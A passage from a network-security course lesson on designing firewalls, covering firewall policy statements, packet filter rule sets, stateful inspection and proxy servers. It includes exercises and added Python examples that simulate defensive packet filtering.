Unfortunately, as is usually the case, this is the extent of the conversation. No other discussion takes place that would allow the network/security administrator to gain a better understanding of the reason(s) behind the need for a firewall, and what placing the firewall within the network topology is supposed to accomplish.
In relation to our network/security administrator, and their quandary about having to purchase a device that will do a large number of things, all or most of which might or might not be necessary for the network security issue(s) in question, it will be helpful for us to briefly look at what a firewall cannot do, so we can begin to understand what it can do.
A few areas where a firewall will have difficulty in securing the network are as follows:
Viruses: Some firewalls do have the ability to detect virus traffic; however, attackers can package a virus in so many forms, and firewalls are not designed as anti-virus systems, so this is not a primary function of a firewall. Your firewalls may be able to identify some virus traffic, but you should always use internal anti-virus software.
Employee misuse: This is a hard point, but a valid one. Employees often do things unknowingly. They may respond to forged email addresses, or they may run programs that come from friends, assuming they are safe.
Secondary connections: If employees have modems in their computers and/or are able to use a wireless network connection, they may make new connections to the Internet for personal reasons. These connections render much of the firewall useless to this client. If File and Print Sharing is turned on, this can lead to adverse results, even while the firewall itself is properly configured.
Social engineering: If the network administrators gave out firewall information to someone calling from your ISP, with no verification, there is a serious problem.
Poor architecture: Without a well thought out and vetted firewall design, it becomes very difficult, maybe even impossible, to configure the firewall properly in order to ensure that the necessary security precautions are in place within the network at all times.
Implementation Options for Firewalls
There is no one correct standard for implementing a firewall within a network. The following concepts show several different possibilities for firewall implementations.
A Single Packet Filtering Device
As shown in the following figure, the network has been protected by a single device configured as a packet filter, permitting or denying access based on the contents of the packet headers.
Figure 4-2: An example of a single packet filtering device.
A Multi-homed Device
As shown in the following figure, the network is being protected by a device (most likely a computer) that has been configured with multiple network interfaces. Proxy software will run on the device to forward packets between the interfaces.
Figure 4-3: An example of a single multi-homed device as a proxy server.
A Screened Host
As shown in the following figure, the network is protected by combining the functions of proxy servers and the function of packet filtering. The packet filter accepts incoming traffic from the proxy only. If a client tries to communicate with the packet filter directly, bypassing the proxy, the data will be discarded.
Figure 4-4: An example of a screened host running behind a packet filtering device.
A Demilitarized Zone (DMZ)
In the following figure, the network has a special zone, or area, that has been created to allow for the placement of servers that need to be accessed by both Internet and intranet based clients. This special zone, the DMZ, requires two filtering devices (firewalls will traditionally be used for this) and can have multiple machines existing within its boundary.
Figure 4-5: An example of a Demilitarized Zone (DMZ).
TASK 4A-1
Firewall Planning
Objective: In order to implement firewall systems, you will need to be able to diagram the different methods used for implementation.
1. Diagram the method described in this topic for the firewall implementation that most accurately reflects your current network design.
2. If you had a blank check and could design a firewall implementation for your network, what would that design look like? If it differs from your current design, please diagram the new solution that you would build.
Topic 4B
Create a Firewall Policy
Before you can identify configuration options or implementation techniques, you must have a firewall policy. In many instances, organizations rush into firewall selection and installation without enough thought on how this complex device is to be used.
For a firewall to be designed and deployed correctly, there must be a firewall policy in place. While not as complete as an organizational security policy, the firewall policy has its place. The policy items in place for the firewall are part of the overall security policy the organization uses.
The firewall policy can generally have one of two viewpoints: either deny everything except what is explicitly allowed, or permit everything except what is explicitly denied. It is the general consensus that the former of the two viewpoints is used.
It is a good starting point to assume that all traffic is to be denied, except that which the policy has identified as explicitly being allowed. This also usually turns out to be less work for the network/security administrator. Imagine creating a list of all the ports Trojans use, and all the ports for applications your users are not authorized to use, and then creating rules to block each of them. Compare that to creating a list of what the users are allowed to use, and granting them access to those services and applications explicitly.
There are different names for the items that can be included in the security policy, and the ones that follow are very common. The items include the Acceptable Usage Statement, the Network Connection Statement, the Contracted Worker Statement, and the Firewall Administrator Statement.
After building the overall security policy, if it becomes very large (some organizations have policies that are hundreds of pages long), you may want to pull out and copy the sections related to the firewall and have a separate subdocument for the firewall alone.
Having subdocuments is not a requirement, but it makes reading the policy much easier. The subdocuments are easier to index, reference, and view. Many organizations now run an internal web server to house important documents, such as the policies, for employees. The policy is one of those documents, and the subdocuments are easier to view and read when only a handful of pages, versus scrolling through 200 pages of content.
The Acceptable Use Statement
This portion of the policy can take the most time, energy, meetings, and effort to create. To be able to describe, in detail, the proper usages of a computer within the network is a difficult task for some organizations. There is a necessary balance that must be achieved between wanting to maintain tight security and giving employees the ability to do their jobs.
Of all the potential devices in an organization, however, the computer is often the most misused. It is this misuse that the security policy attempts to control.
Several points to consider when creating this portion of the policy are as follows:
Applications other than those supplied by, or approved by, the company are not to be installed on any computer. This includes any programs that can be downloaded from the Internet or brought in on CD-ROM, DVD-ROM, USB device, or floppy disk.
Applications that have been provided for the individual computer in the organization may not, under any circumstances, be copied or installed onto any other computer, including the user's home computer, unless the organization has made it clear, through written policy and participation in an appropriate licensing program authorized by the vendor, that employees have the ability to exercise Home Use Rights for the particular software in question. If a backup copy is required for archive, the organization will be responsible for creating and storing the archive copy.
Computers may not be left unattended with a user account still logged on. If a user is temporarily away from the computer, the computer must be left in a locked state. Screensavers must employ the password protection option.
The computer and its installed applications are to be used for organizational related activity only.
The computer and its installed applications may not be used in any way to threaten or harass another individual.
The installed email application is the only authorized email service allowed for use, and employees may not use this email service for personal use.
From this list, you can see the types of things that are to be covered in the policy. If there are examples that cannot be implemented on the firewall, even in part, they may be best located in the overall security policy document for the organization. Some of the examples given in the previous list fall into that category; for example, screensavers, installing applications at home, or threatening of individuals. These items clearly must be in the security policy, but may not be items that can be directly implemented on the firewall.
The Network Connection Statement
This portion of the policy involves the types of devices that are to be granted connections to the network. Here is where you can define the issues related to the network operating systems, devices that use the network, and how those devices must be configured in order to use the network in a secure fashion.
This section may have the most functional use on the firewall, as this section is defining actual network traffic. Some of the items that may be included in this portion are:
Network scanning is not to be permitted by any user of the network, other than those in network administration roles.
Users may access FTP sites to upload and download needed files, but internal user computers may not have FTP server software installed and running.
Users may access WWW on port 80 as required.
Users may access email on port 25 as required.
Users may not access NNTP on any port.
Users in subnet 10.0.10.0 are allowed to use SSH for remote administration purposes.
Users not in subnet 10.0.10.0 are not allowed to use SSH to connect to any location or device.
Users may not run any form of chat software to the Internet, including, but not limited to, AOL Instant Messenger, Yahoo Chat, IRC, ICQ, and MSN Chat.
Users may not download files over 5 MB in size.
Anti-virus software must be installed and running on all computers.
Anti-virus updates are required weekly on user computers.
Anti-virus updates are required daily on all servers.
No new hardware (including network cards and modems) may be installed in any computer by any party other than the network administrators.
No unauthorized links to the Internet from any computer are allowed under any circumstances.
As you can see, this list could go on and on. These are only examples to get you started. This section can get technical, as in deciding which ports to allow to and from subnets or computers in the network. This may be where you spend the most time developing the firewall policy, as it is most relevant to implementation on the firewall.
The Contracted Worker Statement
This portion of the policy is often overlooked. The policy must address the issue of contracted, or temporary, workers. These individuals may require only occasional access to resources on the network.
The list of items for the contracted worker statement may overlap with other areas of the policy, but this does not present a problem. Obviously, the feature or rule would only be implemented once, but it is better to list an item twice than to assume the item has been covered elsewhere.
Some examples of items in the contracted worker statement portion of the policy are:
No contractors or temporary workers shall have access to unauthorized resources.
No contractor or temporary worker shall be permitted to scan the network.
No contractor or temporary worker shall copy data from a computer to a form of removable media, such as CD-ROM, DVD-ROM, USB device, or floppy disk.
No contractor or temporary worker may use FTP, unless specifically granted permission in writing.
No contractor or temporary worker will have access to Telnet or SSH unless specifically granted permission in writing.
From these examples, you can see that there are areas which overlap. As the saying goes, it is better to be safe than sorry.
The Firewall Administrator Statement
Some organizations may not have a separate statement for the administrator of the firewall itself. If yours is one that will require such a statement, here are some possible examples of the items that could appear in it:
The firewall administrator must be certified by the vendor of the firewall.
The firewall administrator must have SCNA certification.
The firewall administrator must know all the applications authorized to be installed on computers in the network.
The firewall administrator shall report directly to the Chief Security Officer.
The firewall administrator must be reachable at all times, 24 hours a day, 7 days a week.
As you can see, this area can almost be considered the job role of the firewall administrator. Some organizations will have such a policy, others will not. It can be a benefit in a large organization to know these items, and to have them written in the policy.
From these examples, you can start to build the framework for the security policy, and, in this case, the specific firewall portion of the policy. The firewall policy should be a working document that can be modified on a regular basis. The security world is ever-changing, so be sure your policy changes with it!
TASK 4B-1
Creating a Simple Firewall Policy
1. Read through the following scenario of a corporate network.
The network is a single office, with 200 nodes. Currently, it is connected to the Internet through a single 64K ISDN, but they are getting 1.5M SDSL installed in a week, and want to use a firewall on their new connection. The network is a single Windows NT 4.0 domain with an internal web server and an internal email server. The internal servers are accessed by employees and customers over the Internet.
The CEO has stated that email must not be used for personal use and that no one can download anything harmful to the network or organization. You are the firewall administrator and have given the CEO a more specific set of questions, which are answered here:
Your Question                                          The CEO's Answer
Can the users use newsgroups?                          No.
Can the users run Telnet to the Internet?              No.
Can the users visit external websites?                 Yes.
Are there any websites to be defined as off limits?    Anything pornographic.
Can users use Instant Messaging software?              Only internally.
Can users upload to FTP?                               No.
Can users download from FTP?                           Only if it is not a dangerous file.
Can users access external email servers?               Yes, if it is company-related.
Who is the firewall administrator?                     You are.
Is 24x7 firewall support expected?                     Yes.
Topic 4C
Rule Sets and Packet Filters
Having a solid policy is one important part of preparing to implement the firewall. Another is being aware of the different types of firewalls that exist. We briefly discussed firewall methodologies earlier, and now we will focus on packet filtering.
Packet filters were the first types of firewalls used to protect networks. Traditionally, packet filters were (and still are) implemented as access control lists on routers. This single border security device was all that was needed for quite some time.
The router becomes the single access point to the network, and the place where the packet filtering functions. In the following figure, you can see examples of where the router may be located. The function of the packet filter will differ based on its location in the scheme of the network.
Figure 4-6: An example of the location of packet filters.
In the first example, there is only a single device running as the packet filter for the network. This device will have to be configured very well, as the security of the network is riding on its rules.
In the second example, the packet filter must be carefully configured not to allow direct access from clients on the internal network to the Internet. Likewise, it must be configured so that traffic from the Internet cannot directly reach the internal clients.
In the third example, a DMZ has been created. This requires the two devices to be configured differently. The packet filter directly connected to the Internet must be secured to allow access to the hosts on the DMZ, but not the internal network. The packet filter connected to the internal network must be secured so that clients can access the hosts on the DMZ, but not the Internet directly.
The Packet Filter Rules
Regardless of the implementation of packet filter that is used, there must be a set of rules in place for the packet filter to use in making decisions. For creating the rules, you can consult your firewall policy, as discussed earlier.
The general questions that should be answered are:
Which services are to be allowed to access the Internet from the intranet?
Which services are to be allowed to access the intranet from the Internet?
Which hosts are allowed specific access that others do not have?
Although each product will have different methods of implementing these rules, there are some basic considerations that apply to nearly all packet filtering devices. They include:
The interface to which the rule will apply. For example, is it the internal network interface, or the external Internet connection?
The direction of the packet. Will this rule apply to packets that are entering on the defined interface, or does it apply to packets that are leaving on the interface?
Addresses used to make the decision. Will the rule base its decision on the source IP address, destination IP address, or both?
Ports used to make the decision. Will the rule base its decision on the source port, destination port, or both?
Higher level protocols. Is this rule to be based on the protocol using IP, such as UDP or TCP?
Ports and Sockets
Before we can get into the specifics of the rules, we need to review TCP/IP, ports, and sockets. This is shown in the following figure. The IP address specifies the host that is communicating, and the port identifies the actual end-points of the network communication. Ports allow for multiple connections to different applications via the same two hosts at any given moment. A socket is an IP address combined with a port number.
Since the first 1023 ports are defined as privileged, ports higher than 1023 must be used for return communication of common protocols. In other words, when you request a web page at port 80, it is returned to you at a port higher than 1023.
Figure 4-7: An example showing ports in exchange of a web page.
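To see a socket pair as the text defines it, here is an added example (written for this edit, not code from the course or from the Security Certified Program). It opens a listener on the loopback address on an operating-system-chosen port, which stands in for the web server's port 80, connects a client to it, and reports the (address, port) of each end. The ephemeral port the client is given is the "port higher than 1023" that the reply traffic comes back to. The function name and the dictionary keys are my own.

```python
"""Socket pairs on a TCP connection, shown with a loopback connection.

Added example (not from the course). A listener on 127.0.0.1 with port 0
lets the operating system choose the listening port; it stands in for a
web server's port 80. The client side is assigned an ephemeral port,
which on every common OS lies above 1023.
"""
import socket


def socket_pair_demo():
    """Open one loopback TCP connection and return both ends as (ip, port).

    Returns a dict with the server socket, the client socket, the client
    socket as seen from the server side, and the five-tuple a filter
    would have to match in the reply direction.
    """
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))       # port 0: the OS picks a free port
    listener.listen(1)
    server_sock = listener.getsockname()  # (ip, port) that clients connect to

    client = socket.create_connection(server_sock)
    conn, _ = listener.accept()
    try:
        client_sock = client.getsockname()   # (ip, ephemeral port) of the client
        seen_by_server = conn.getpeername()  # the same pair, from the server's side
        return {
            "server_socket": server_sock,
            "client_socket": client_sock,
            "seen_by_server": seen_by_server,
            # Reply direction: from the server socket back to the client socket.
            "reply_five_tuple": ("tcp", server_sock[0], server_sock[1],
                                 client_sock[0], client_sock[1]),
            "client_port_is_high": client_sock[1] > 1023,
        }
    finally:
        conn.close()
        client.close()
        listener.close()


if __name__ == "__main__":
    for name, value in socket_pair_demo().items():
        print(f"{name}: {value}")
```

The reply five-tuple is what a stateless filter has to describe in its "return traffic" rule: source port 80 on the server, and a destination port above 1023 on the client that the filter cannot know in advance.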
Keeping this in mind, let's look at some rules that can be created with the packet filter. Assume the goal is to only allow access to web pages on the Internet and the DMZ; the Internet can access web pages on the web server, and all other services are not to be allowed access to the Internet. The following figure depicts rules for a firewall.
Figure 4-8: Building rules for the firewall.
In this case, the first rule allows the Internet to access port 80 of the web server, which can respond on any port higher than 1023 (the second rule). The third rule allows outbound requests to external web servers on port 80, and the fourth allows those requests to be returned. The final rule disallows all other traffic.
Is this a good set of rules? No! While it may initially look like it does the requested job, it has in fact left most of the network side open. The firewall will accept connections from the whole world on ports higher than 1023. This was not the intention. A simple Trojan horse program could take the network down, as if there were no firewall in place.
To increase the security of the network, then, another level is required. This next level is used to define the source and destination ports. For example, rule number 2 should add port information for both the source and destination. It could then state: outbound traffic is fine to go to ports higher than 1023, if the data originated from port 80. Likewise, rule 4 could state that data may be accepted on ports higher than 1023 if it came from port 80. You'll see an example of what rule 4 should not look like in the following figure.
Figure 4-9: The highlighting of rule 4, adding source and destination ports. Note this example leaves the high ports open, which is not considered good security.
These additions increase the security of the rule set substantially. There should never be an open rule like rule number 4 shown here.
The Ack Bits
Another option to add to the rule set that can increase security involves the ack bit. This bit is set only in response to a request. When a packet is sent to establish the connection, this bit is a zero; when the reply is returned, the bit is set to a one. Your firewall can examine this bit to ensure that the packet is indeed a reply to communication that originated inside the network.
Adding the ack bit on top of the source and destination ports in the previous example increases security. An example of what this rule may now look like is shown in the following figure.
Figure 4-10: Rule 4, with the additional ACK bit.
Now if we look at this same rule with our added functions of source and destination port, and the inclusion of the ack bit, we can see that the firewall rule has become more secure. In order for a packet to meet this rule, it must have originated from port 80, have the ack bit set, and have a destination port higher than 1023. We can feel comfortable with this rule now that it has been tightened.
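Both the Network Connection Statement items of Topic 4B (SSH permitted only from subnet 10.0.10.0) and the rule 4 discussion of Figures 4-8 through 4-10 can be tried in code. The following is an added example, written for this edit and not code from the course or from the Security Certified Program: a first-match packet filter evaluator with an implicit final deny, holding the loose rule set the text describes for Figure 4-8 beside the tightened one of Figure 4-10. The Packet and Rule classes, the LAN block 10.0.0.0/24, the web server address 10.0.0.80 and the outside addresses are assumptions made for the example.

```python
"""First-match stateless packet filter with an implicit final deny.

Added example, not the course's own code. The rule tables follow the
text's description of Figure 4-8 (the loose set) and Figure 4-10 (rule 4
tightened with a source port and the ACK bit), plus the SSH item from
the Network Connection Statement. The addresses of the LAN, the web
server and the outside hosts are constructed for the example.
"""
from dataclasses import dataclass
from ipaddress import IPv4Network, ip_address, ip_network
from typing import Optional

ANY = ip_network("0.0.0.0/0")
INTERNAL = ip_network("10.0.0.0/24")      # assumed LAN address block
ADMIN_NET = ip_network("10.0.10.0/24")    # the 10.0.10.0 subnet from the policy text
WEB_SERVER = ip_network("10.0.0.80/32")   # assumed address of the web server
WEB = range(80, 81)
SSH = range(22, 23)
HIGH = range(1024, 65536)                 # "ports higher than 1023"


@dataclass(frozen=True)
class Packet:
    direction: str      # "in": Internet -> LAN, "out": LAN -> Internet
    src: str
    dst: str
    proto: str          # "tcp" or "udp"
    sport: int
    dport: int
    ack: bool = False   # TCP ACK flag


@dataclass(frozen=True)
class Rule:
    action: str                        # "permit" or "deny"
    direction: Optional[str] = None    # None: either direction
    src: IPv4Network = ANY
    dst: IPv4Network = ANY
    proto: Optional[str] = None        # None: any protocol
    sport: Optional[range] = None      # None: any source port
    dport: Optional[range] = None      # None: any destination port
    ack: Optional[bool] = None         # None: don't care; True: ACK must be set

    def matches(self, p: Packet) -> bool:
        return (
            (self.direction is None or self.direction == p.direction)
            and ip_address(p.src) in self.src
            and ip_address(p.dst) in self.dst
            and (self.proto is None or self.proto == p.proto)
            and (self.sport is None or p.sport in self.sport)
            and (self.dport is None or p.dport in self.dport)
            and (self.ack is None or self.ack == p.ack)
        )


def evaluate(rules, packet: Packet) -> str:
    """Return the action of the first rule that matches; deny if none does."""
    for rule in rules:
        if rule.matches(packet):
            return rule.action
    return "deny"


# Figure 4-8 as the text describes it: rules 2 and 4 admit anything to a high port.
LOOSE_RULES = [
    Rule("permit", "in", ANY, WEB_SERVER, "tcp", dport=WEB),    # 1: Internet -> web server
    Rule("permit", "out", WEB_SERVER, ANY, "tcp", dport=HIGH),  # 2: web server replies
    Rule("permit", "out", INTERNAL, ANY, "tcp", dport=WEB),     # 3: LAN -> external web
    Rule("permit", "in", ANY, INTERNAL, "tcp", dport=HIGH),     # 4: replies, and everything else
    Rule("deny"),                                               # 5: all other traffic
]

# Figure 4-10: rules 2 and 4 require source port 80 and the ACK bit; the
# policy's SSH statement becomes two rules that cover the admin subnet only.
TIGHT_RULES = [
    Rule("permit", "in", ANY, WEB_SERVER, "tcp", dport=WEB),
    Rule("permit", "out", WEB_SERVER, ANY, "tcp", sport=WEB, dport=HIGH, ack=True),
    Rule("permit", "out", INTERNAL, ANY, "tcp", dport=WEB),
    Rule("permit", "in", ANY, INTERNAL, "tcp", sport=WEB, dport=HIGH, ack=True),
    Rule("permit", "out", ADMIN_NET, ANY, "tcp", dport=SSH),
    Rule("permit", "in", ANY, ADMIN_NET, "tcp", sport=SSH, dport=HIGH, ack=True),
    Rule("deny"),
]

# Constructed packets.
WEB_REPLY = Packet("in", "203.0.113.10", "10.0.0.5", "tcp", 80, 40000, ack=True)
UNSOLICITED = Packet("in", "198.51.100.7", "10.0.0.5", "tcp", 31337, 12345)
SSH_FROM_ADMIN = Packet("out", "10.0.10.4", "203.0.113.22", "tcp", 50000, 22)
SSH_FROM_USER = Packet("out", "10.0.0.5", "203.0.113.22", "tcp", 50001, 22)


def compare(packet: Packet) -> dict:
    """Decision of both rule sets for one packet."""
    return {"loose": evaluate(LOOSE_RULES, packet), "tight": evaluate(TIGHT_RULES, packet)}


if __name__ == "__main__":
    for name, pkt in [("web reply", WEB_REPLY), ("unsolicited high-port packet", UNSOLICITED),
                      ("ssh from admin subnet", SSH_FROM_ADMIN), ("ssh from user subnet", SSH_FROM_USER)]:
        print(f"{name:30s} {compare(pkt)}")
```

Running it shows the point the text makes: the constructed unsolicited packet to port 12345 is permitted by the loose rule 4 and denied by the tightened one, while a genuine web reply from source port 80 with ACK set passes both. The SSH rules admit the admin subnet only, so the user-subnet SSH attempt falls through to the final deny.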
Stateless and Stateful Packet Inspection
Now that you have an idea of where and how packet filters can be placed in the defense of a network, we will discuss the types of packet filters.
Packet filters fall into one of two major categories:
Stateless packet filters, sometimes called standard packet filters.
Stateful packet filters.
Stateless Packet Filters
As we have discussed, packet filters are generally implemented on border routers, using a given set of rules. The theory behind a packet filter is that it may make a decision about a packet based on any portion of the protocol header; however, the vast majority of filters are based on the most significant information in the header. Those areas are:
IP address filtering.
TCP or UDP port numbers.
Protocol type.
Fragmentation.
IP Address Filtering
IP address filtering is perhaps the oldest form of packet filtering. If you want to block access to a specific host, create a rule that says that IP address is off-limits. If you want to grant access to an entire subnet, create a rule that says that subnet has access. The IP address filters allow for permitting or denial of addresses, using only the IP address to make the decision.
If the filter were to try to define all the hosts that are to be denied, the rule set would get very long, and a rule like that for individual hosts in a large organization is unreasonable. Since the rule set can get very long, the odds of making a mistake are increased, and therefore it is not a good way to implement strong security in a large organization.
Using the filter to specifically grant access by an IP address, on the other hand, can be much more effective. The areas that hosts will be allowed to access will be, by the very nature of security, a lesser number than the areas in which hosts are not allowed access.
Using primarily allowed addresses over denied addresses makes the implementation of the rules easier. And, it makes the task of the attacker a bit harder. The attacker would have to learn the list of approved addresses to attempt an attack. When the attacker does finally learn the addresses, he or she can spoof the source IP address and get a packet past the filter.
If the attacker was trying to execute a denial of service (DoS) attack, this will get them past the packet filter with no problems. If the attacker was performing a different type of attack, where the return packet was not needed, this type of filter is easily bypassed with spoofed source packets.
TCP and/or UDP Port Numbers
Dealing with the Internet, using TCP and/or UDP port numbers in the packet l-
ter will increase its effectiveness. Filtering at this level, in addition to the IP
address, is commonly used in most networks today. If the host is running only the
WWW service, there is no need to have any port open other than 80 (or 443, if
SSL has been added).
As with IP addresses, it is much easier to open the ports that are needed, versus
closing the ports that are to be denied. With over 65,000 ports to open or close,
no doubt most people would agree.
Protocol Filtering
In the event that using UDP and TCP port numbers is still not enough, you can resort to protocol filtering. Packet filtering of this type inspects the contents of the IP header to determine the upper layer protocol used, and accepts or discards the packet if there is a match. The protocols you may choose to block or accept are few:
TCP
UDP
ICMP
IGMP
Although this type of filtering can be used, it is very limiting; use caution when employing this strategy. If you have a server running a service that uses UDP, and that is the only authorized service on the server, then allow only UDP. But be aware that such a move removes the option of troubleshooting utilities such as ping, due to the lack of ICMP.
Fragmentation
When networks and routing were first developed, many of the links used had very small bandwidth capabilities. Because of this, large files transmitted across the Internet had to be broken into several pieces. This is known as fragmentation.
When packet filters inspect the header of a fragment, they will see the port number, protocol type, IP address, and an indicator that this is fragment 0. Herein lies the problem: fragments 1 through x do not contain this same information, so the packet filter has nothing to use in making a decision.
Packet filters would therefore drop fragment 0 and allow the remaining packets through. The logic was that without fragment 0, the packet could not be used. This was not always the case.
Lesson 4: Designing Firewalls 173
Smart and very TCP/IP-savvy attackers would create entire attacks that begin with fragment 1. The attackers were aware that many versions of TCP/IP would go ahead and reassemble fragments even if fragment 0 was missing. These attacks would pass through the packet filter as if it were not even there.
Stateful Packet Filters
It should be obvious by now that, despite their best efforts, stateless packet filters simply are not good enough for the security needs of today's networks. The logic a stateless packet filter employs is not complete.
Stateful packet filters still employ the same techniques as stateless packet filters, but they do not base their decisions on single packets. If the network is expected to be safe, a decision cannot be made on a packet-by-packet basis alone, because a single packet does not describe the overall communication that is occurring between the two hosts.
Stateful packet filters increase security by remembering the state of connections at the network and session layers as they pass through the filter. This session information is stored and used to analyze all packets moving through the filter.
For example, if a client on the internal network initiates a connection to an unknown host on the Internet, it sends a SYN along with the IP address and port number of the destination host. As this packet passes through the filter, an entry is made in the state table logging the connection information. When the filter receives the return packet, it can look at its table and see that the address, port number, and SYN/ACK setting match what is expected.
If a packet is received and there is no entry in the table for it, the packet is dropped. The following figure shows an example of the steps of stateful packet inspection.
Figure 4-11: The Stateful Packet Filter function.
The stateful packet filter will remove entries from the state table if there is no response, usually within a few minutes. This ensures there are no holes left open for an attacker to exploit. The rules are programmed into the stateful packet filter just as they are in a stateless packet filter, although they may be called policies instead of rules.
How Attackers Get Around Packet Filters
Although packet filters are solid security devices, they need to be supplemented with other services the firewall can perform, such as proxy and NAT. Still, you may be wondering how attackers get around packet filters. Some of the exploits are due to poor design by the firewall administrator, while others are limitations imposed by packet filtering itself.
Many packet filters will drop fragment 0 (called the 0th fragment) but allow the remaining fragments through. This can be a serious security hole, so be sure to check how your firewall handles fragmentation. The attacker can simply place a whole valid packet in one that has been marked as fragment 1, effectively bypassing the security of the packet filter completely.
One of the most critical errors is not in the technology, but in the implementation of the filter. Suppose you have only a web server and an email server on your network, and you configure the packet filter to allow only ports 80, 443, and 25 in, with all other inbound ports closed and all outbound ports open. You have a very insecure network. The outgoing ports are as critical to configure as the inbound ports. Make sure you do not fall into the trap of blocking only inbound ports: it may look secure, but it is not.
These are two examples of how packet filtering can be bypassed, and of why additional security services are needed.
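The following is an added example, not part of the course text: a small Python model of the stateful packet filter described above, written from the defender's side. It keeps a state table opened by an outbound SYN, matches the return SYN/ACK against it, drops packets with no entry, ages entries out after a timeout, and passes a non-initial fragment only if the 0th fragment of the same datagram was accepted, so a transfer that "begins with fragment 1" is dropped. The rule set follows the Task 4C-1 scenario (inbound only to a web and a mail server, outbound FTP, web and mail, in both directions); all addresses, ports, the timeout and the packets are constructed values.

```python
from dataclasses import dataclass, field

INTERNAL_NET = "10.0.0."   # constructed internal address prefix
STATE_TIMEOUT = 120        # seconds an idle state entry is kept

# Rules for the Task 4C-1 scenario: inbound only to the web and mail servers,
# outbound only to FTP, web and mail services. Addresses are constructed.
INBOUND_ALLOWED = {("10.0.0.80", "tcp", 80), ("10.0.0.80", "tcp", 443),
                   ("10.0.0.25", "tcp", 25)}
OUTBOUND_ALLOWED = {("tcp", 21), ("tcp", 80), ("tcp", 443), ("tcp", 25), ("tcp", 110)}


@dataclass
class Packet:
    src: str
    dst: str
    proto: str
    sport: int
    dport: int
    syn: bool = False
    ack: bool = False
    ip_id: int = 0
    frag_offset: int = 0     # 0 means the 0th fragment (or an unfragmented packet)
    more_frags: bool = False


@dataclass
class StatefulFilter:
    state: dict = field(default_factory=dict)           # 5-tuple -> last seen
    accepted_frags: dict = field(default_factory=dict)  # (src, dst, ip_id) -> last seen

    def expire(self, now):
        # Age out idle entries so no half-open hole is left for an attacker.
        for table in (self.state, self.accepted_frags):
            for key in [k for k, seen in table.items() if now - seen > STATE_TIMEOUT]:
                del table[key]

    def decide(self, pkt, now):
        self.expire(now)
        if pkt.frag_offset != 0:
            # Later fragments carry no ports or flags; pass them only when the
            # 0th fragment of the same datagram was accepted a moment ago.
            key = (pkt.src, pkt.dst, pkt.ip_id)
            return "ACCEPT" if key in self.accepted_frags else "DROP"
        verdict = self._decide_first(pkt, now)
        if verdict == "ACCEPT" and pkt.more_frags:
            self.accepted_frags[(pkt.src, pkt.dst, pkt.ip_id)] = now
        return verdict

    def _decide_first(self, pkt, now):
        fwd = (pkt.src, pkt.sport, pkt.dst, pkt.dport, pkt.proto)
        rev = (pkt.dst, pkt.dport, pkt.src, pkt.sport, pkt.proto)
        if rev in self.state:
            # Return traffic for a logged connection: refresh the entry and pass.
            self.state[rev] = now
            return "ACCEPT"
        if fwd in self.state:
            self.state[fwd] = now
            return "ACCEPT"
        # No table entry: only a bare SYN that the rules permit may open one.
        if pkt.proto == "tcp" and not (pkt.syn and not pkt.ack):
            return "DROP"
        outbound = pkt.src.startswith(INTERNAL_NET)
        if outbound and (pkt.proto, pkt.dport) in OUTBOUND_ALLOWED:
            self.state[fwd] = now
            return "ACCEPT"
        if not outbound and (pkt.dst, pkt.proto, pkt.dport) in INBOUND_ALLOWED:
            self.state[fwd] = now
            return "ACCEPT"
        return "DROP"


def run_scenario():
    """Drive the filter with constructed packets and return the verdicts."""
    f = StatefulFilter()
    return [
        # internal client opens a web connection; the SYN/ACK comes back
        f.decide(Packet("10.0.0.5", "203.0.113.7", "tcp", 40000, 80, syn=True), 0),
        f.decide(Packet("203.0.113.7", "10.0.0.5", "tcp", 80, 40000, syn=True, ack=True), 1),
        # unsolicited SYN/ACK with no table entry
        f.decide(Packet("203.0.113.9", "10.0.0.5", "tcp", 80, 40001, syn=True, ack=True), 2),
        # outside host may reach the mail server on 25 but not Telnet on 23
        f.decide(Packet("198.51.100.3", "10.0.0.25", "tcp", 5000, 25, syn=True), 3),
        f.decide(Packet("198.51.100.3", "10.0.0.25", "tcp", 5001, 23, syn=True), 4),
        # a datagram that "begins with fragment 1" has no accepted 0th fragment
        f.decide(Packet("198.51.100.3", "10.0.0.25", "tcp", 0, 0, ip_id=77, frag_offset=1), 5),
        # a legitimately fragmented SYN to the web server: 0th fragment, then the rest
        f.decide(Packet("198.51.100.3", "10.0.0.80", "tcp", 5002, 443, syn=True,
                        ip_id=88, more_frags=True), 6),
        f.decide(Packet("198.51.100.3", "10.0.0.80", "tcp", 0, 0, ip_id=88, frag_offset=1), 7),
        # the idle web connection has been aged out; its old return traffic is dropped
        f.decide(Packet("203.0.113.7", "10.0.0.5", "tcp", 80, 40000, ack=True), 300),
    ]


if __name__ == "__main__":
    for verdict in run_scenario():
        print(verdict)
```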
TASK 4C-1
Firewall Rule Creation
1. Read through the following scenario of a corporate network.
Your network is a mixed environment of Windows NT, Windows 2000, UNIX, and Linux. Your users in the network need to access FTP sites for upload and download, websites, and email servers on the Internet. Your network provides a web server and email server that need to be accessed by the Internet.
2. Based on this scenario, create a sample rule set, or portion thereof, needed for this packet filter.
Topic 4D
Proxy Server
As you have seen, packet filters are a great start to securing the network with a firewall, but they also require help to create a more secure environment. One of the ways to increase security is to add the services of a proxy server.
Proxy servers were initially used to cache commonly visited web pages, speeding up network and Internet use. They have evolved to not only cache web pages but to become part of the security system of a network.
The packet filter, as discussed, works by inspecting the header information and basing its decision on defined rules or policies. The proxy works at the application layer and is able to provide services to the network. The proxy acts as a sort of gateway (which is why it is also called an application gateway) for all packets to flow through.
When a proxy is configured and running on the network, there is no direct communication between the client and the server. The packet filter allows this direct communication, while the proxy prevents it.
A significant distinction between a packet filter and a proxy server, then, is that the proxy understands the application or service that is used, and the packet filter does not. The proxy server can therefore permit or deny access based on the actual function the user is trying to perform.
Proxy Process
In this example, the client has requested a web page and identified the server that has the web page. The request for the web page is passed to the proxy server. At this point, the proxy server does not act as a router and forward the packet. Instead, it consults its set of rules regarding this service (WWW in this case) and decides whether the request is to be granted.
Once the proxy has decided to allow the request, a new packet is created with a source IP address of the proxy server. This new packet is the request for the web page from the destination server. The web server receives the request and returns the web page to the requesting host, which, since the proxy is running, is the proxy server.
When the proxy receives the web page, it checks its rules to see if this page is to be allowed. Once the decision is made to proceed, the proxy makes a new packet with the web page as the payload and sends this to the original client.
The following figure is an illustration of the basic function that a proxy server plays in the network. Notice that the client packet never directly reaches the server, and vice versa.
Figure 4-12: A WWW proxy running in a network.
This type of service can increase the security of the network considerably, as no packets can pass directly from the client to the server. The proxy service will need to be configured for each type of service that is allowed. For example, a separate proxy will be needed for SMTP, WWW, FTP, and Telnet, if all these services are to be used.
